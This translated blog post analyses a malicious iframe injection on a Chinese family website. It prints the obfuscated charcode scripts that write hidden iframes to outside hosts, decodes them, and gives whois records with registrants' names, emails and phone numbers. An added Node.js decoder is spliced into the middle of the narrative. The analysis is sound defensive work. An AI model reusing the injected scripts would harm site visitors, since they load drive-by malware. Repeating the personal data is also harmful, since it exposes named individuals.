First published on my blog: http://www.areway.cn/?p=175

Over the weekend, as soon as I came online, 鸭子 messaged me on QQ to say his site had been hit with a malicious iframe injection (挂马). I didn't pay much attention and just opened the link directly; here is the page source I captured:
<script>t='60,105,102,114,97,109,101,
32,115,114,99,61,104,116,116,112,58,47,47,
102,114,101,101,46,117,45,117,117,117,46,99,
110,47,101,114,114,111,114,46,104,116,109,
32,119,105,100,116,104,61,49,48,48,32,104,
101,105,103,104,116,61,48,62,60,47,105,102,
114,97,109,101,62';
t=eval('String.fromCharCode('+t+')');document.write(t);</script>

<script>t='60,105,102,114,97,109,101,32,115,
114,99,61,104,116,116,112,58,47,47,102,114,
101,101,46,117,45,117,117,117,46,99,110,47,
101,114,114,111,114,46,104,116,109,32,119,
105,100,116,104,61,49,48,48,32,104,101,105,
103,104,116,61,48,62,60,47,105,102,114,97,
109,101,62';t=eval('String.fromCharCode('+t+')');
document.write(t);</script>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Published By Newasp.cc 2007-12-7-18:03:23 -->
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>首页 - 爱生活家庭网
The script above is a block of decimal-encoded ("encrypted") code. Roughly, all of the character codes are stored in the variable t, decoded with String.fromCharCode, and finally written into the page with document.write(t).

After conversion, the string reads roughly as follows (click it at your own risk):

<script>t='<iframe src=http://free.u-uuu.cn/error.htm width=………

Whois details for the domain u-uuu.cn:
Domain Name: u-uuu.cn
ROID: 20070901s10001s64972306-cn
Domain Status: ok
Registrant Organization: 王雷
Registrant Name: 王雷
Administrative Email: czlovexs@126.com
Sponsoring Registrar: 北京万网志成科技有限公司
Name Server: ns.yovole.com
Name Server: ns1.yovole.com
Registration Date: 2007-09-01 17:54
Expiration Date: 2008-09-01 17:54
Finally I pinged the address; nothing came back....

I continued the analysis inside a virtual machine: opened the link above in IE, viewed the source, and straight away there was yet another nested embed:

<iframe src=http://www.foafau.info/ms15.htm width=1 height=1></iframe>
<script language="javascript" src="http://count43.51yes.com/click.aspx?id=4333375720&logo=6"></script>
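The decoding step described above and the hidden-iframe chain found on the second-stage page, as an added Node.js example that is not part of the original post: it decodes the String.fromCharCode digit lists statically (no eval, no document.write, so it is safe to run over a captured page source) and then lists the iframe/script sources the payload pulls in, flagging 1x1 or zero-height frames. The two sample strings are reconstructed from the captures quoted in this post; the function names and the hidden-frame heuristic are my own.

```javascript
// Added example (not from the original post): statically decode the
// decimal-charcode obfuscation used by the injected <script> blocks and
// list the iframes/scripts the decoded HTML pulls in. Nothing is eval()'d
// and nothing is written to a DOM.

// Constructed sample 1: the first injected block as captured on the site,
// with the digit list wrapped across lines the way the post shows it.
const FIRST_STAGE = `<script>t='60,105,102,114,97,109,101,
32,115,114,99,61,104,116,116,112,58,47,47,
102,114,101,101,46,117,45,117,117,117,46,99,
110,47,101,114,114,111,114,46,104,116,109,
32,119,105,100,116,104,61,49,48,48,32,104,
101,105,103,104,116,61,48,62,60,47,105,102,
114,97,109,101,62';
t=eval('String.fromCharCode('+t+')');document.write(t);</script>`;

// Constructed sample 2: the nested embeds found on the second-stage page.
const SECOND_STAGE = `<iframe src=http://www.foafau.info/ms15.htm width=1 height=1></iframe>
<script language="javascript" src="http://count43.51yes.com/click.aspx?id=4333375720&logo=6"></script>`;

// Find every quoted, comma-separated list of decimal char codes and turn it
// back into text, exactly as String.fromCharCode would, minus the eval.
function decodeCharCodeStrings(html) {
  const listRe = /['"]\s*(\d{1,3}(?:\s*,\s*\d{1,3})+)\s*['"]/g;
  const decoded = [];
  let m;
  while ((m = listRe.exec(html)) !== null) {
    const codes = m[1].split(',').map(s => parseInt(s.trim(), 10));
    decoded.push(String.fromCharCode(...codes));
  }
  return decoded;
}

// Pull <iframe>/<script src=...> tags out of HTML and flag iframes sized
// 1x1 or zero-height, the classic signature of a drive-by injection.
function extractEmbeds(html) {
  const tagRe = /<(iframe|script)\b([^>]*)>/gi;
  const embeds = [];
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const tag = m[1].toLowerCase();
    const attrs = m[2];
    const src = /\ssrc\s*=\s*["']?([^\s"'>]+)/i.exec(attrs);
    if (!src) continue;                      // inline script, no remote source
    const w = /\swidth\s*=\s*["']?(\d+)/i.exec(attrs);
    const h = /\sheight\s*=\s*["']?(\d+)/i.exec(attrs);
    const hidden = tag === 'iframe' && w !== null && h !== null &&
      (parseInt(w[1], 10) <= 1 || parseInt(h[1], 10) <= 1);
    embeds.push({ tag, src: src[1], hidden });
  }
  return embeds;
}

// Analyse one captured page: decode its obfuscated strings, then collect
// embeds from both the raw page and the decoded payloads.
function analyse(html) {
  const decoded = decodeCharCodeStrings(html);
  const embeds = [html, ...decoded].flatMap(extractEmbeds);
  return { decoded, embeds };
}

for (const [name, page] of [['first stage', FIRST_STAGE], ['second stage', SECOND_STAGE]]) {
  const r = analyse(page);
  console.log(name, r.decoded, r.embeds);
}
```

Running it prints the decoded first-stage iframe (pointing at free.u-uuu.cn/error.htm, height 0, so flagged hidden) and the two second-stage embeds, with the 1x1 foafau.info frame flagged and the 51yes.com counter script left unflagged. The digit-list regex tolerates whitespace and line breaks around the commas, which is why the wrapped capture from the post decodes without any cleanup.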
This domain is most likely the trojan author's own.

Whois details for foafau.info:
Access to INFO WHOIS information is provided to assist persons in
determining the contents of a domain name registration record in the
Afilias registry database. The data in this record is provided by
Afilias Limited for informational purposes only, and Afilias does not
guarantee its accuracy. This service is intended only for query-based
access. You agree that you will use this data only for lawful purposes
and that, under no circumstances will you use this data to: (a) allow,
enable, or otherwise support the transmission by e-mail, telephone, or
facsimile of mass unsolicited, commercial advertising or solicitations
to entities other than the data recipient's own existing customers; or
(b) enable high volume, automated, electronic processes that send
queries or data to the systems of Registry Operator, a Registrar, or
Afilias except as reasonably necessary to register domain names or
modify existing registrations. All rights reserved. Afilias reserves
the right to modify these terms at any time. By submitting this query,
you agree to abide by this policy.
Domain ID:D22418703-LRMS
Domain Name:FOAFAU.INFO
Created On:20-Nov-2007 16:05:42 UTC
Last Updated On:20-Nov-2007 16:05:44 UTC
Expiration Date:20-Nov-2008 16:05:42 UTC
Sponsoring Registrar:GoDaddy.com Inc. (R171-LRMS)
Status:CLIENT DELETE PROHIBITED
Status:CLIENT RENEW PROHIBITED
Status:CLIENT TRANSFER PROHIBITED
Status:CLIENT UPDATE PROHIBITED
Status:TRANSFER PROHIBITED
Registrant ID:GODA-040110615
Registrant Name:liu hong
Registrant Organization:
Registrant Street1:beijing
Registrant Street2:
Registrant Street3:
Registrant City:beijing
Registrant State/Province:
Registrant Postal Code:100000
Registrant Country:CN
Registrant Phone:+86.860108888777
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Registrant Email:bbbshiji@163.com
Admin ID:GODA-240110615
Admin Name:liu hong
Admin Organization:
Admin Street1:beijing
Admin Street2:
Admin Street3:
Admin City:beijing
Admin State/Province:
Admin Postal Code:100000
Admin Country:CN
Admin Phone:+86.860108888777
Admin Phone Ext.:
Admin FAX:
Admin FAX Ext.:
Admin Email:bbbshiji@163.com
Billing ID:GODA-340110615
Billing Name:liu hong
Billing Organization:
Billing Street1:beijing
Billing Street2:
Billing Street3:
Billing City:beijing
Billing State/Province:
Billing Postal Code:100000
Billing Country:CN
Billing Phone:+86.860108888777
Billing Phone Ext.:
Billing FAX:
Billing FAX Ext.:
Billing Email:bbbshiji@163.com
Tech ID:GODA-140110615
Tech Name:liu hong
Tech Organization:
Tech Street1:beijing
Tech Street2:
Tech Street3:
Tech City:beijing
Tech State/Province:
Tech Postal Code:100000
Tech Country:CN
Tech Phone:+86.860108888777
Tech Phone Ext.:
Tech FAX:
Tech FAX Ext.:
Tech Email:bbbshiji@163.com
Name Server:NS27.DOMAINCONTROL.COM
Name Server:NS28.DOMAINCONTROL.COM
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Next I downloaded the code from each of the files:

Going through it step by step..

It is all the same decimal-encoded code, and I couldn't be bothered to analyse it any further; anyone who enjoys this kind of thing is welcome to carry on from here.